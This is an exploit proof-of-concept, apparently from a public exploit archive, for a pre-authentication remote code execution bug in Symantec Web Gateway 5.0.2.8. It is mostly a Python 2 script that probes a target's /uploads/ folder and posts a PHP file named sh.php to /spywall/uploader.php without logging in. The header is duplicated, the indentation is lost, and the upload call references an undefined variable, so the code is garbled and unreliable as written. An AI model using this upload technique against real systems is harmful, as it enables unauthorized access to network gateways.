# Title: Preauth RCE in Symantec Web Gateway 5.0.2.8
# Date: 26.03.2020
# Vendor: www.symantec.com
# Vulnerable software: www.symantec.com
# Repo: https://github.com/c610/free/
# Date: 26.03.2020
# Vendor: www.symantec.com
# Vulnerable software: www.symantec.com
# Repo: https://github.com/c610/free/



#!/usr/bin/env python
# seemantech.py - small preauth poc for symantec web gateway
# 27.03.2020 by code610
#
# more : https://twitter.com/CodySixteen
# https://code610.blogspot.com
#
# to use this bug:
# - uploads folder must exists on remote host
# - and it must be writable
#
# have fun
#
import sys, re
import requests

target = sys.argv[1]

def main():
print 'symantec web gateway preauth rce poc'
print ' seemantech.py - vs - %s' % ( target )
print ''

baseUrl = target
uploadUrl = target + '/uploads/'

checkBase = requests.get(target,verify=False)
check_status = checkBase.status_code

if check_status == 200:
print '[+] target alive, checking uploads'

checkUpload = requests.get(uploadUrl, verify=False)
isthereupload = checkUpload.status_code

if isthereupload == 200:
print '[+] uploads exists! continuing...'

uploader = target + '/spywall/uploader.php'
upshell = open('sh.php','w')
upshell.write('<?php phpinfo();')
upshell.close()
up_data = {
'file':open('sh.php','rb')
}

upme = requests.post(uploader, files=files, verify=False)
upresp = upme.text
print upresp

# run me:
if __name__ == '__main__':
main()